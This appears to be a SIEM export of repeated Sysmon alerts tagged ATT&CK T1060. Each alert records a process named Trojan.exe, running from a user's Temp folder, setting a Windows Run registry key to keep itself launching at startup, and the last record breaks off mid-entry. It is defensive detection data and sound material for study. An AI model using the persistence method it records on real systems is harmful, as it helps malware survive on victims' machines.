HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:34.697717200Z"",""eventRecordID"":""1240"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:34.686\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:34.686"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:45.856",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:33.584 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:33.588822800Z"",""eventRecordID"":""1239"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:33.584\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:33.584"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:45.839",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:32.560 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:32.677363500Z"",""eventRecordID"":""1238"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:32.560\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:32.560"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:44.670",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:31.544 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:31.563845600Z"",""eventRecordID"":""1237"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:31.544\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:31.544"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:43.670",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:30.529 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:30.551872300Z"",""eventRecordID"":""1234"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:30.529\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:30.529"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:42.654",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:29.525 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:29.526398600Z"",""eventRecordID"":""1232"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:29.525\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:29.525"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:41.624",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:28.513 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:28.521901200Z"",""eventRecordID"":""1230"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:28.513\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:28.513"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:40.673",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:27.346 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:27.403214200Z"",""eventRecordID"":""1228"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:27.346\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:27.346"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:39.581",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:26.046 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:26.181878900Z"",""eventRecordID"":""1226"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:26.046\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:26.046"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:38.914",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:24.943 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:25.080968800Z"",""eventRecordID"":""1225"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:24.943\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:24.943"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:37.000",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:23.863 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:23.894557500Z"",""eventRecordID"":""1223"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:23.863\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:23.863"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:34.974",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:22.746 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 